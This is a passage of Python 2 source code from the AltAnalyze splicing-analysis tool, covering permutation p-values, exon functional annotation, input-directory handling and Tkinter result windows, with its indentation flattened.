p_splice_val_dist=p_splice_val_dist2; p_splice_val_dist.reverse()
p_val, pos_permute, total_permute, greater_than_true_permute = statistics.permute_p(p_splice_val_dist,new_ref_splice_val,len(permute_lists))
#print p_val,ref_splice_val, pos_permute, total_permute, greater_than_true_permute,p_splice_val_dist[-3:];kill
###When two groups are of equal size, there will be 2 pos_permutes rather than 1
if len(permute_lists[0][0]) == len(permute_lists[0][1]): greater_than_true_permute = (pos_permute/2) - 1 #size of the two groups are equal
else:greater_than_true_permute = (pos_permute) - 1
if analysis_method == 'linearregres': greater_than_true_permute = (pos_permute) - 1 ###since this is a one sided test, unlike ASPIRE
###Below equation is fine if the population is large
permute_p_values[(probeset1,probeset2)] = [p_val, pos_permute, total_permute, greater_than_true_permute]
###Remove non-significant linear regression results
if analysis_method == 'linearregres':
if p_val <= permute_p_threshold or greater_than_true_permute < 2: splice_event_list2.append((score,x)) ###<= since many p=0.05
print "Number of permutation p filtered splice event:",len(splice_event_list2)
if len(permute_p_values)>0: p_value_call = 'permuted_aspire_p-value'
if analysis_method == 'linearregres': splice_event_list = splice_event_list2
return splice_event_list, p_value_call, permute_p_values
def permute_ASPIRE_filtered(affygene,probeset1,probeset2,p,y,ref_splice_val,x):
### Get raw expression values for each permuted group for the two probesets
b1,e1 = permute_dI(array_raw_group_values[probeset1],p)
try: b2,e2 = permute_dI(array_raw_group_values[probeset2],p)
except IndexError: print probeset2, array_raw_group_values[probeset2],p; kill
### Get the average constitutive expression values (averaged per-sample across probesets) for each permuted group
try: bc,ec = permute_dI(avg_const_exp_db[affygene],p)
except IndexError: print affygene, avg_const_exp_db[affygene],p; kill
if factor_out_expression_changes == 'no':
ec = bc
### Analyze the averaged ratio's of junction expression relative to permuted constitutive expression
try: p_splice_val = abs(statistics.aspire_stringent(b1/bc,e1/ec,b2/bc,e2/ec)) ### This the permuted ASPIRE score
except Exception: p_splice_val = 0
#print p_splice_val, ref_splice_val, probeset1, probeset2, affygene; dog
if y == 0: ###The first permutation is always the real one
### Grab the absolute number with small number of decimal places
try:
new_ref_splice_val = str(p_splice_val); new_ref_splice_val = float(new_ref_splice_val[0:8])
ref_splice_val = str(abs(ref_splice_val)); ref_splice_val = float(ref_splice_val[0:8]); y += 1
except ValueError:
###Only get this error if your ref_splice_val is a null
print y, probeset1, probeset2; print ref_splice_val, new_ref_splice_val, p
print b1/bc,e1/ec,b2/bc,e2/ec; print (b1/bc)/(e1/ec), (b2/bc)/(e2/ec)
print x[7],x[8],x[9],x[10]; kill
return p_splice_val
def permute_samples(a,p):
baseline = []; experimental = []
for p_index in p[0]:
baseline.append(a[p_index]) ###Append expression values for each permuted list
for p_index in p[1]:
experimental.append(a[p_index])
return baseline, experimental
def permute_dI(all_samples,p):
baseline, experimental = permute_samples(all_samples,p)
#if get_non_log_avg == 'no':
gb = statistics.avg(baseline); ge = statistics.avg(experimental) ###Group avg baseline, group avg experimental value
gb = statistics.log_fold_conversion_fraction(gb); ge = statistics.log_fold_conversion_fraction(ge)
#else:
#baseline = statistics.log_fold_conversion_fraction(baseline); experimental = statistics.log_fold_conversion_fraction(experimental)
#gb = statistics.avg(baseline); ge = statistics.avg(experimental) ###Group avg baseline, group avg experimental value
return gb,ge
def format_exon_functional_attributes(affygene,critical_probeset_list,functional_attribute_db,up_exon_list,down_exon_list,protein_length_list):
### Add functional attributes
functional_attribute_list2=[]
new_functional_attribute_str=''
new_seq_attribute_str=''
new_functional_attribute_list=[]
if array_type == 'exon' or array_type == 'gene' or explicit_data_type != 'null': critical_probesets = critical_probeset_list[0]
else: critical_probesets = tuple(critical_probeset_list)
key = affygene,critical_probesets
if key in functional_attribute_db:
###Grab exon IDs corresponding to the critical probesets
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
try: critical_exons = regulated_exon_junction_db[critical_probesets].CriticalExons() ###For junction arrays
except Exception: print key, functional_attribute_db[key];kill
else: critical_exons = [exon_db[critical_probesets].ExonID()] ###For exon arrays
for exon in critical_exons:
for entry in functional_attribute_db[key]:
x = 0
functional_attribute = entry[0]
call = entry[1] # +, -, or ~
if ('AA:' in functional_attribute) or ('ref' in functional_attribute):
x = 1
if exon in up_exon_list:
### design logic to determine whether up or down regulation promotes the functional change (e.g. NMD)
if 'ref' in functional_attribute:
new_functional_attribute = '(~)'+functional_attribute
data_tuple = new_functional_attribute,exon
elif call == '+' or call == '~':
new_functional_attribute = '(+)'+functional_attribute
data_tuple = new_functional_attribute,exon
elif call == '-':
new_functional_attribute = '(-)'+functional_attribute
data_tuple = new_functional_attribute,exon
if 'AA:' in functional_attribute and '?' not in functional_attribute:
functional_attribute_temp = functional_attribute[3:]
if call == '+' or call == '~':
val1,val2 = string.split(functional_attribute_temp,'->')
else:
val2,val1 = string.split(functional_attribute_temp,'->')
val1,null = string.split(val1,'(')
val2,null = string.split(val2,'(')
protein_length_list.append([val1,val2])
elif exon in down_exon_list:
if 'ref' in functional_attribute:
new_functional_attribute = '(~)'+functional_attribute
data_tuple = new_functional_attribute,exon
elif call == '+' or call == '~':
new_functional_attribute = '(-)'+functional_attribute
data_tuple = new_functional_attribute,exon
elif call == '-':
new_functional_attribute = '(+)'+functional_attribute
data_tuple = new_functional_attribute,exon
if 'AA:' in functional_attribute and '?' not in functional_attribute:
functional_attribute_temp = functional_attribute[3:]
if call == '+' or call == '~':
val2,val1 = string.split(functional_attribute_temp,'->')
else:
val1,val2 = string.split(functional_attribute_temp,'->')
val1,null = string.split(val1,'(')
val2,null = string.split(val2,'(')
protein_length_list.append([val1,val2])
if x == 0 or (exclude_protein_details != 'yes'):
try: new_functional_attribute_list.append(new_functional_attribute)
except UnboundLocalError:
print entry
print up_exon_list,down_exon_list
print exon, critical_exons
print critical_probesets, (key, affygene,critical_probesets)
for i in functional_attribute_db:
print i, functional_attribute_db[i]; kill
###remove protein sequence prediction_data
if 'sequence' not in data_tuple[0]:
if x == 0 or exclude_protein_details == 'no':
functional_attribute_list2.append(data_tuple)
###Get rid of duplicates, but maintain non-alphabetical order
new_functional_attribute_list2=[]
for entry in new_functional_attribute_list:
if entry not in new_functional_attribute_list2:
new_functional_attribute_list2.append(entry)
new_functional_attribute_list = new_functional_attribute_list2
#new_functional_attribute_list = unique.unique(new_functional_attribute_list)
#new_functional_attribute_list.sort()
for entry in new_functional_attribute_list:
if 'sequence' in entry: new_seq_attribute_str = new_seq_attribute_str + entry + ','
else: new_functional_attribute_str = new_functional_attribute_str + entry + ','
new_seq_attribute_str = new_seq_attribute_str[0:-1]
new_functional_attribute_str = new_functional_attribute_str[0:-1]
return new_functional_attribute_str, functional_attribute_list2, new_seq_attribute_str,protein_length_list
def grab_summary_dataset_annotations(functional_attribute_db,comparison_db,include_truncation_results_specifically):
###If a second filtering database present, filter the 1st database based on protein length changes
fa_db={}; cp_db={} ###index the geneids for efficient recall in the next segment of code
for (affygene,annotation) in functional_attribute_db:
try: fa_db[affygene].append(annotation)
except KeyError: fa_db[affygene]= [annotation]
for (affygene,annotation) in comparison_db:
try: cp_db[affygene].append(annotation)
except KeyError: cp_db[affygene]= [annotation]
functional_attribute_db_exclude = {}
for affygene in fa_db:
if affygene in cp_db:
for annotation2 in cp_db[affygene]:
if ('trunc' in annotation2) or ('frag' in annotation2) or ('NMDs' in annotation2):
try: functional_attribute_db_exclude[affygene].append(annotation2)
except KeyError: functional_attribute_db_exclude[affygene] = [annotation2]
functional_annotation_db = {}
for (affygene,annotation) in functional_attribute_db:
### if we wish to filter the 1st database based on protein length changes
if affygene not in functional_attribute_db_exclude:
try: functional_annotation_db[annotation] += 1
except KeyError: functional_annotation_db[annotation] = 1
elif include_truncation_results_specifically == 'yes':
for annotation_val in functional_attribute_db_exclude[affygene]:
try: functional_annotation_db[annotation_val] += 1
except KeyError: functional_annotation_db[annotation_val] = 1
annotation_list = []
annotation_list_ranked = []
for annotation in functional_annotation_db:
if 'micro' not in annotation:
count = functional_annotation_db[annotation]
annotation_list.append((annotation,count))
annotation_list_ranked.append((count,annotation))
annotation_list_ranked.sort(); annotation_list_ranked.reverse()
return annotation_list, annotation_list_ranked
def reorganize_attribute_entries(attribute_db1,build_attribute_direction_databases):
attribute_db2 = {}; inclusion_attributes_hit_count={}; exclusion_attributes_hit_count={}
genes_with_inclusion_attributes={}; genes_with_exclusion_attributes={};
###This database has unique gene, attribute information. No attribute will now be represented more than once per gene
for key in attribute_db1:
###Make gene the key and attribute (functional elements or protein information), along with the associated exons the values
affygene = key[0];exon_attribute = key[1];exon_list = attribute_db1[key]
exon_list = unique.unique(exon_list);exon_list.sort()
attribute_exon_info = exon_attribute,exon_list #e.g. 5'UTR, [E1,E2,E3]
try: attribute_db2[affygene].append(attribute_exon_info)
except KeyError: attribute_db2[affygene] = [attribute_exon_info]
###Separate out attribute data by direction for over-representation analysis
if build_attribute_direction_databases == 'yes':
direction=exon_attribute[1:2];unique_gene_attribute=exon_attribute[3:]
if direction == '+':
try: inclusion_attributes_hit_count[unique_gene_attribute].append(affygene)
except KeyError: inclusion_attributes_hit_count[unique_gene_attribute] = [affygene]
genes_with_inclusion_attributes[affygene]=[]
if direction == '-':
try: exclusion_attributes_hit_count[unique_gene_attribute].append(affygene)
except KeyError: exclusion_attributes_hit_count[unique_gene_attribute] = [affygene]
genes_with_exclusion_attributes[affygene]=[]
inclusion_attributes_hit_count = eliminate_redundant_dict_values(inclusion_attributes_hit_count)
exclusion_attributes_hit_count = eliminate_redundant_dict_values(exclusion_attributes_hit_count)
"""for key in inclusion_attributes_hit_count:
inclusion_attributes_hit_count[key] = len(inclusion_attributes_hit_count[key])
for key in exclusion_attributes_hit_count:
exclusion_attributes_hit_count[key] = len(exclusion_attributes_hit_count[key])"""
if build_attribute_direction_databases == 'yes': return attribute_db2,inclusion_attributes_hit_count,genes_with_inclusion_attributes,exclusion_attributes_hit_count,genes_with_exclusion_attributes
else: return attribute_db2
########### Misc. Functions ###########
def eliminate_redundant_dict_values(database):
db1={}
for key in database:
list = unique.unique(database[key])
list.sort()
db1[key] = list
return db1
def add_a_space(string):
if len(string)<1:
string = ' '
return string
def convertToLog2(data_list):
return map(lambda x: math.log(float(x), 2), data_list)
def addGlobalFudgeFactor(data_list,data_type):
new_list = []
if data_type == 'log':
for item in data_list:
new_item = statistics.log_fold_conversion_fraction(item)
new_list.append(float(new_item) + global_addition_factor)
new_list = convertToLog2(new_list)
else:
for item in data_list: new_list.append(float(item) + global_addition_factor)
return new_list
def copyDirectoryPDFs(root_dir,AS='AS'):
directories = ['AltResults/AlternativeOutputDirectoryDescription.pdf',
'AltResultsDirectoryDescription.pdf',
'ClusteringDirectoryDescription.pdf',
'ExpressionInputDirectoryDescription.pdf',
'ExpressionOutputDirectoryDescription.pdf',
'GO-Elite/GO-Elite_resultsDirectoryDescription.pdf',
'GO-EliteDirectoryDescription.pdf',
'RootDirectoryDescription.pdf']
import shutil
for dir in directories:
file = string.split(dir,'/')[-1]
proceed=True
if 'AltResult' in dir and AS!='AS': proceed=False
if proceed:
try: shutil.copyfile(filepath('Documentation/DirectoryDescription/'+file), filepath(root_dir+dir))
except Exception: pass
def restrictProbesets(dataset_name):
### Take a file with probesets and only perform the splicing-analysis on these (e.g. those already identified from a previous run with a specific pattern)
### Allows for propper denominator when calculating z-scores for microRNA and protein-domain ORA
probeset_list_filename = import_dir = '/AltDatabaseNoVersion/filtering'; filtered_probeset_db={}
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
try:
dir_list = read_directory(import_dir)
fn_dir = filepath(import_dir[1:])
except Exception: dir_list=[]; fn_dir=''
if len(dir_list)>0:
for file in dir_list:
if file[:-4] in dataset_name:
fn = fn_dir+'/'+file; fn = string.replace(fn,'AltDatabase','AltDatabaseNoVersion')
filtered_probeset_db = importGeneric(fn)
print len(filtered_probeset_db), id_name,"will be used to restrict analysis..."
return filtered_probeset_db
def RunAltAnalyze():
#print altanalyze_files
#print '!!!!!starting to run alt-exon analysis'
#returnLargeGlobalVars()
global annotate_db; annotate_db={}; global splice_event_list; splice_event_list=[]; residuals_dirlist=[]
global dataset_name; global constitutive_probeset_db; global exon_db; dir_list2=[]; import_dir2=''
if array_type == 'AltMouse': import_dir = root_dir+'AltExpression/'+array_type
elif array_type == 'exon':
import_dir = root_dir+'AltExpression/ExonArray/'+species+'/'
elif array_type == 'gene':
import_dir = root_dir+'AltExpression/GeneArray/'+species+'/'
elif array_type == 'junction':
import_dir = root_dir+'AltExpression/JunctionArray/'+species+'/'
else:
import_dir = root_dir+'AltExpression/'+array_type+'/'+species+'/'
#if analysis_method == 'ASPIRE' or analysis_method == 'linearregres' or analysis_method == 'splicing-index':
if array_type != 'AltMouse': gene_annotation_file = "AltDatabase/ensembl/"+species+"/"+species+"_Ensembl-annotations.txt"
else: gene_annotation_file = "AltDatabase/"+species+"/"+array_type+"/"+array_type+"_gene_annotations.txt"
annotate_db = ExonAnalyze_module.import_annotations(gene_annotation_file,array_type)
###Import probe-level associations
exon_db={}; filtered_arrayids={};filter_status='no'
try: constitutive_probeset_db,exon_db,genes_being_analyzed = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status)
except IOError:
print_out = 'The annotation database: \n'+probeset_annotations_file+'\nwas not found. Ensure this file was not deleted and that the correct species has been selected.'
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
print traceback.format_exc()
badExit()
run=0
### Occurs when analyzing multiple conditions rather than performing a simple pair-wise comparison
if run_from_scratch == 'Annotate External Results': import_dir = root_dir
elif analyze_all_conditions == 'all groups':
import_dir = string.replace(import_dir,'AltExpression','AltExpression/FullDatasets')
if array_type == 'AltMouse':
import_dir = string.replace(import_dir,'FullDatasets/AltMouse','FullDatasets/AltMouse/Mm')
elif analyze_all_conditions == 'both':
import_dir2 = string.replace(import_dir,'AltExpression','AltExpression/FullDatasets')
if array_type == 'AltMouse':
import_dir2 = string.replace(import_dir2,'FullDatasets/AltMouse','FullDatasets/AltMouse/Mm')
try: dir_list2 = read_directory(import_dir2) #send a sub_directory to a function to identify all files in a directory
except Exception:
try:
if array_type == 'exon': array_type_dir = 'ExonArray'
elif array_type == 'gene': array_type_dir = 'GeneArray'
elif array_type == 'junction': array_type_dir = 'GeneArray'
else: array_type_dir = array_type
import_dir2 = string.replace(import_dir2,'AltExpression/'+array_type_dir+'/'+species+'/','')
import_dir2 = string.replace(import_dir2,'AltExpression/'+array_type_dir+'/','');
dir_list2 = read_directory(import_dir2)
except Exception:
print_out = 'The expression files were not found. Please make\nsure you selected the correct species and array type.\n\nselected species: '+species+'\nselected array type: '+array_type+'\nselected directory:'+import_dir2
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
print traceback.format_exc()
badExit()
try: dir_list = read_directory(import_dir) #send a sub_directory to a function to identify all files in a directory
except Exception:
try:
if array_type == 'exon': array_type_dir = 'ExonArray'
elif array_type == 'gene': array_type_dir = 'GeneArray'
elif array_type == 'junction': array_type_dir = 'JunctionArray'
else: array_type_dir = array_type
import_dir = string.replace(import_dir,'AltExpression/'+array_type_dir+'/'+species+'/','')
import_dir = string.replace(import_dir,'AltExpression/'+array_type_dir+'/','');
try: dir_list = read_directory(import_dir)
except Exception:
import_dir = root_dir
dir_list = read_directory(root_dir) ### Occurs when reading in an AltAnalyze filtered file under certain conditions
except Exception:
print_out = 'The expression files were not found. Please make\nsure you selected the correct species and array type.\n\nselected species: '+species+'\nselected array type: '+array_type+'\nselected directory:'+import_dir
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out
print traceback.format_exc()
badExit()
dir_list+=dir_list2
### Capture the corresponding files in the residual dir to make sure these files exist for all comparisons - won't if FIRMA was run on some files
if analysis_method == 'FIRMA':
try:
residual_dir = root_dir+'AltExpression/FIRMA/residuals/'+array_type+'/'+species+'/'
residuals_dirlist = read_directory(residual_dir)
except Exception: null=[]
try:
residual_dir = root_dir+'AltExpression/FIRMA/FullDatasets/'+array_type+'/'+species+'/'
residuals_dirlist += read_directory(residual_dir)
except Exception: null=[]
dir_list_verified=[]
for file in residuals_dirlist:
for filename in dir_list:
if file[:-4] in filename: dir_list_verified.append(filename)
dir_list = unique.unique(dir_list_verified)
junction_biotype = 'no'
if array_type == 'RNASeq':
### Check to see if user data includes junctions or just exons
for probeset in exon_db:
if '-' in probeset: junction_biotype = 'yes'; break
if junction_biotype == 'no' and analysis_method != 'splicing-index' and array_type == 'RNASeq':
dir_list=[] ### DON'T RUN ALTANALYZE WHEN JUST ANALYZING EXON DATA
print 'No junction data to summarize... proceeding with exon analysis\n'
elif len(dir_list)==0:
print_out = 'No expression files available in the input directory:\n'+root_dir
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
badExit()
dir_list = filterAltExpressionFiles(dir_list,altanalyze_files) ### Looks to see if the AltExpression files are for this run or from an older run
for altanalyze_input in dir_list: #loop through each file in the directory to output results
###Import probe-level associations
if 'cel_files' in altanalyze_input:
print_out = 'The AltExpression directory containing the necessary import file(s) is missing. Please verify the correct parameters and input directory were selected. If this error persists, contact us.'
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
badExit()
if run>0: ### Only re-set these databases after the run when batch analysing multiple files
exon_db={}; filtered_arrayids={};filter_status='no' ###Use this as a means to save memory (import multiple times - only storing different types relevant information)
constitutive_probeset_db,exon_db,genes_being_analyzed = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status)
if altanalyze_input in dir_list2: dataset_dir = import_dir2 +'/'+ altanalyze_input ### Then not a pairwise comparison
else: dataset_dir = import_dir +'/'+ altanalyze_input
dataset_name = altanalyze_input[:-4] + '-'
print "Beginning to process",dataset_name[0:-1]
### If the user want's to restrict the analysis to preselected probesets (e.g., limma or FIRMA analysis selected)
global filtered_probeset_db; filtered_probeset_db={}
try: filtered_probeset_db = restrictProbesets(dataset_name)
except Exception: null=[]
if run_from_scratch != 'Annotate External Results':
###Import expression data and stats and filter the expression data based on fold and p-value OR expression threshold
try: conditions,adj_fold_dbase,nonlog_NI_db,dataset_name,gene_expression_diff_db,midas_db,ex_db,si_db = performExpressionAnalysis(dataset_dir,constitutive_probeset_db,exon_db,annotate_db,dataset_name)
except IOError:
#except Exception,exception:
#print exception
print traceback.format_exc()
print_out = 'The AltAnalyze filtered expression file "'+dataset_name+'" is not propperly formatted. Review formatting requirements if this file was created by another application.'
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
badExit()
else:
conditions = 0; adj_fold_dbase={}; nonlog_NI_db={}; gene_expression_diff_db={}; ex_db={}; si_db={}
defineEmptyExpressionVars(exon_db); adj_fold_dbase = original_fold_dbase
###Run Analysis
summary_results_db, summary_results_db2, aspire_output, aspire_output_gene, number_events_analyzed = splicingAnalysisAlgorithms(nonlog_NI_db,adj_fold_dbase,dataset_name,gene_expression_diff_db,exon_db,ex_db,si_db,dataset_dir)
aspire_output_list.append(aspire_output); aspire_output_gene_list.append(aspire_output_gene)
try: clearObjectsFromMemory(exon_db); clearObjectsFromMemory(constitutive_probeset_db); constitutive_probeset_db=[]
except Exception: null=[]
try: clearObjectsFromMemory(last_exon_region_db);last_exon_region_db=[]
except Exception: null=[]
try: clearObjectsFromMemory(adj_fold_dbase);adj_fold_dbase=[]; clearObjectsFromMemory(nonlog_NI_db);nonlog_NI_db=[]
except Exception: null=[]
try: clearObjectsFromMemory(gene_expression_diff_db);gene_expression_diff_db=[]; clearObjectsFromMemory(midas_db);midas_db=[]
except Exception: null=[]
try: clearObjectsFromMemory(ex_db);ex_db=[]; clearObjectsFromMemory(si_db);si_db=[]
except Exception: null=[]
try: run+=1
except Exception: run = 1
if run>0: ###run = 0 if no filtered expression data present
try: return summary_results_db, aspire_output_gene_list, number_events_analyzed
except Exception:
print_out = 'AltAnalyze was unable to find an expression dataset to analyze in:\n',import_dir,'\nor\n',import_dir2,'\nPlease re-run and select a valid input directory.'
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
badExit()
else:
try: clearObjectsFromMemory(exon_db); clearObjectsFromMemory(constitutive_probeset_db); constitutive_probeset_db=[]
except Exception: null=[]
try: clearObjectsFromMemory(last_exon_region_db);last_exon_region_db=[]
except Exception: null=[]
return None
def filterAltExpressionFiles(dir_list,current_files):
dir_list2=[]
try:
if len(current_files) == 0: current_files = dir_list ###if no filenames input
for altanalzye_input in dir_list: #loop through each file in the directory to output results
if altanalzye_input in current_files:
dir_list2.append(altanalzye_input)
dir_list = dir_list2
except Exception: dir_list = dir_list
return dir_list
def defineEmptyExpressionVars(exon_db):
global fold_dbase; fold_dbase={}; global original_fold_dbase; global critical_exon_db; critical_exon_db={}
global midas_db; midas_db = {}; global max_replicates; global equal_replicates; max_replicates=0; equal_replicates=0
for probeset in exon_db: fold_dbase[probeset]='',''
original_fold_dbase = fold_dbase
def universalPrintFunction(print_items):
log_report = open(log_file,'a')
for item in print_items:
if commandLineMode == 'no': ### Command-line has it's own log file write method (Logger)
log_report.write(item+'\n')
else: print item
log_report.close()
class StatusWindow:
def __init__(self,root,expr_var,alt_var,goelite_var,additional_var,exp_file_location_db):
root.title('AltAnalyze version 2.1.3')
statusVar = StringVar() ### Class method for Tkinter. Description: "Value holder for strings variables."
self.root = root
height = 450; width = 500
if os.name != 'nt': height = 500; width = 600
self.sf = PmwFreeze.ScrolledFrame(root,
labelpos = 'n', label_text = 'Results Status Window',
usehullsize = 1, hull_width = width, hull_height = height)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
group = PmwFreeze.Group(self.sf.interior(),tag_text = 'Output')
group.pack(fill = 'both', expand = 1, padx = 10, pady = 0)
Label(group.interior(),width=190,height=1000,justify=LEFT, bg='black', fg = 'white',anchor=NW,padx = 5,pady = 5, textvariable=statusVar).pack(fill=X,expand=Y)
status = StringVarFile(statusVar,root) ### Likely captures the stdout
sys.stdout = status
for dataset in exp_file_location_db:
fl = exp_file_location_db[dataset]; fl.setSTDOUT(sys.stdout)
root.after(100, AltAnalyzeMain(expr_var, alt_var, goelite_var, additional_var, exp_file_location_db, root))
try:
root.protocol("WM_DELETE_WINDOW", self.deleteWindow)
root.mainloop()
except Exception: pass
def deleteWindow(self):
try: self.root.destroy()
except Exception: pass
def quit(self):
try:
self.root.quit()
self.root.destroy()
except Exception: pass
sys.exit()
def exportComparisonSummary(dataset_name,summary_data_dbase,return_type):
log_report = open(log_file,'a')
result_list=[]
for key in summary_data_dbase:
if key != 'QC': ### The value is a list of strings
summary_data_dbase[key] = str(summary_data_dbase[key])
d = 'Dataset name: '+ dataset_name[:-1]; result_list.append(d+'\n')
try:
d = summary_data_dbase['gene_assayed']+':\tAll genes examined'; result_list.append(d)
d = summary_data_dbase['denominator_exp_genes']+':\tExpressed genes examined for AS'; result_list.append(d)
if explicit_data_type == 'exon-only':
d = summary_data_dbase['alt_events']+':\tAlternatively regulated probesets'; result_list.append(d)
d = summary_data_dbase['denominator_exp_events']+':\tExpressed probesets examined'; result_list.append(d)
elif (array_type == 'AltMouse' or array_type == 'junction' or array_type == 'RNASeq') and (explicit_data_type == 'null' or return_type == 'print'):
d = summary_data_dbase['alt_events']+':\tAlternatively regulated junction-pairs'; result_list.append(d)
d = summary_data_dbase['denominator_exp_events']+':\tExpressed junction-pairs examined'; result_list.append(d)
else:
d = summary_data_dbase['alt_events']+':\tAlternatively regulated probesets'; result_list.append(d)
d = summary_data_dbase['denominator_exp_events']+':\tExpressed probesets examined'; result_list.append(d)
d = summary_data_dbase['alt_genes']+':\tAlternatively regulated genes (ARGs)'; result_list.append(d)
d = summary_data_dbase['direct_domain_genes']+':\tARGs - overlaping with domain/motifs'; result_list.append(d)
d = summary_data_dbase['miRNA_gene_hits']+':\tARGs - overlaping with microRNA binding sites'; result_list.append(d)
except Exception:
pass
result_list2=[]
for d in result_list:
if explicit_data_type == 'exon-only': d = string.replace(d,'probeset','exon')
elif array_type == 'RNASeq': d = string.replace(d,'probeset','junction')
result_list2.append(d)
result_list = result_list2
if return_type == 'log':
for d in result_list: log_report.write(d+'\n')
log_report.write('\n')
log_report.close()
return result_list
class SummaryResultsWindow:
def __init__(self,tl,analysis_type,output_dir,dataset_name,output_type,summary_data_dbase):
def showLink(event):
try:
idx = int(event.widget.tag_names(CURRENT)[1]) ### This is just the index provided below (e.g., str(0))
#print [self.LINKS[idx]]
if 'http://' in self.LINKS[idx]:
webbrowser.open(self.LINKS[idx])
elif self.LINKS[idx][-1] == '/':
self.openSuppliedDirectory(self.LINKS[idx])
else:
### Instead of using this option to open a hyperlink (which is what it should do), we can open another Tk window
try: self.viewPNGFile(self.LINKS[idx]) ### ImageTK PNG viewer
except Exception:
try: self.ShowImageMPL(self.LINKS[idx]) ### MatPlotLib based dispaly
except Exception:
self.openPNGImage(self.LINKS[idx]) ### Native OS PNG viewer
#self.DisplayPlots(self.LINKS[idx]) ### GIF based display
except Exception:
null=[] ### anomalous error
self.emergency_exit = False
self.LINKS = []
self.tl = tl
self.tl.title('AltAnalyze version 2.1.3')
self.analysis_type = analysis_type
filename = 'Config/icon.gif'
fn=filepath(filename); img = PhotoImage(file=fn)
can = Canvas(tl); can.pack(side='top'); can.config(width=img.width(), height=img.height())
can.create_image(2, 2, image=img, anchor=NW)
use_scroll = 'yes'
try: runGOElite = run_GOElite
except Exception: runGOElite='decide_later'
if 'QC' in summary_data_dbase:
graphic_links = summary_data_dbase['QC'] ### contains hyperlinks to QC and Clustering plots
if len(graphic_links)==0: del summary_data_dbase['QC'] ### This can be added if an analysis fails
else:
graphic_links = []
label_text_str = 'AltAnalyze Result Summary'; height = 150; width = 500
if analysis_type == 'AS' or 'QC' in summary_data_dbase: height = 330
if analysis_type == 'AS' and 'QC' in summary_data_dbase: height = 330
self.sf = PmwFreeze.ScrolledFrame(tl,
labelpos = 'n', label_text = label_text_str,
usehullsize = 1, hull_width = width, hull_height = height)
self.sf.pack(padx = 5, pady = 1, fill = 'both', expand = 1)
self.frame = self.sf.interior()
txt=Text(self.frame,bg='light gray',width=150, height=80)
txt.pack(expand=True, fill="both")
#txt.insert(END, 'Primary Analysis Finished....\n')
txt.insert(END, 'Results saved to:\n'+output_dir+'\n')
f = Font(family="System", size=12, weight="bold")
txt.tag_config("font", font=f)
i=0
copyDirectoryPDFs(output_dir,AS=analysis_type)
if analysis_type == 'AS':
txt.insert(END, '\n')
result_list = exportComparisonSummary(dataset_name,summary_data_dbase,'print')
for d in result_list: txt.insert(END, d+'\n')
if 'QC' in summary_data_dbase and len(graphic_links)>0:
txt.insert(END, '\nQC and Expression Clustering Plots',"font")
txt.insert(END, '\n\n 1) ')
for (name,file_dir) in graphic_links:
txt.insert(END, name, ('link', str(i)))
if len(graphic_links) > (i+1):
txt.insert(END, '\n %s) ' % str(i+2))
self.LINKS.append(file_dir)
i+=1
txt.insert(END, '\n\nView all primary plots in the folder ')
txt.insert(END, 'DataPlots',('link', str(i))); i+=1
self.LINKS.append(output_dir+'DataPlots/')
else:
url = 'http://altanalyze.readthedocs.io/en/latest/'
self.LINKS=(url,'')
txt.insert(END, '\nFor more information see the ')
txt.insert(END, "AltAnalyze Online Help", ('link', str(0)))
txt.insert(END, '\n\n')
if runGOElite == 'run-immediately':
txt.insert(END, '\n\nView all pathway enrichment results in the folder ')
txt.insert(END, 'GO-Elite',('link', str(i))); i+=1
self.LINKS.append(output_dir+'GO-Elite/')
if analysis_type == 'AS':
txt.insert(END, '\n\nView all splicing plots in the folder ')
txt.insert(END, 'ExonPlots',('link', str(i))); i+=1
try: self.LINKS.append(output_dir+'ExonPlots/')
except Exception: pass
txt.tag_config('link', foreground="blue", underline = 1)
txt.tag_bind('link', '<Button-1>', showLink)
txt.insert(END, '\n\n')
open_results_folder = Button(tl, text = 'Results Folder', command = self.openDirectory)
open_results_folder.pack(side = 'left', padx = 5, pady = 5);
if analysis_type == 'AS':
#self.dg_url = 'http://www.altanalyze.org/domaingraph.htm'
self.dg_url = 'http://www.altanalyze.org/domaingraph.htm'
dg_pdf_file = 'Documentation/domain_graph.pdf'; dg_pdf_file = filepath(dg_pdf_file); self.dg_pdf_file = dg_pdf_file
text_button = Button(tl, text='Start DomainGraph in Cytoscape', command=self.SelectCytoscapeTopLevel)
text_button.pack(side = 'right', padx = 5, pady = 5)
self.output_dir = output_dir + "AltResults"
self.whatNext_url = 'http://altanalyze.readthedocs.io/en/latest/' #http://www.altanalyze.org/what_next_altexon.htm'
whatNext_pdf = 'Documentation/what_next_alt_exon.pdf'; whatNext_pdf = filepath(whatNext_pdf); self.whatNext_pdf = whatNext_pdf
if output_type == 'parent': self.output_dir = output_dir ###Used for fake datasets
else:
if pathway_permutations == 'NA':
self.output_dir = output_dir + "ExpressionOutput"
else: self.output_dir = output_dir
self.whatNext_url = 'http://altanalyze.readthedocs.io/en/latest/' #'http://www.altanalyze.org/what_next_expression.htm'
whatNext_pdf = 'Documentation/what_next_GE.pdf'; whatNext_pdf = filepath(whatNext_pdf); self.whatNext_pdf = whatNext_pdf
what_next = Button(tl, text='What Next?', command=self.whatNextlinkout)
what_next.pack(side = 'right', padx = 5, pady = 5)
quit_buttonTL = Button(tl,text='Close View', command=self.close)
quit_buttonTL.pack(side = 'right', padx = 5, pady = 5)
continue_to_next_win = Button(text = 'Continue', command = self.continue_win)
continue_to_next_win.pack(side = 'right', padx = 10, pady = 10)
quit_button = Button(root,text='Quit', command=self.quit)
quit_button.pack(side = 'right', padx = 5, pady = 5)
button_text = 'Help'; help_url = 'http://www.altanalyze.org/help_main.htm'; self.help_url = filepath(help_url)
pdf_help_file = 'Documentation/AltAnalyze-Manual.pdf'; pdf_help_file = filepath(pdf_help_file); self.pdf_help_file = pdf_help_file
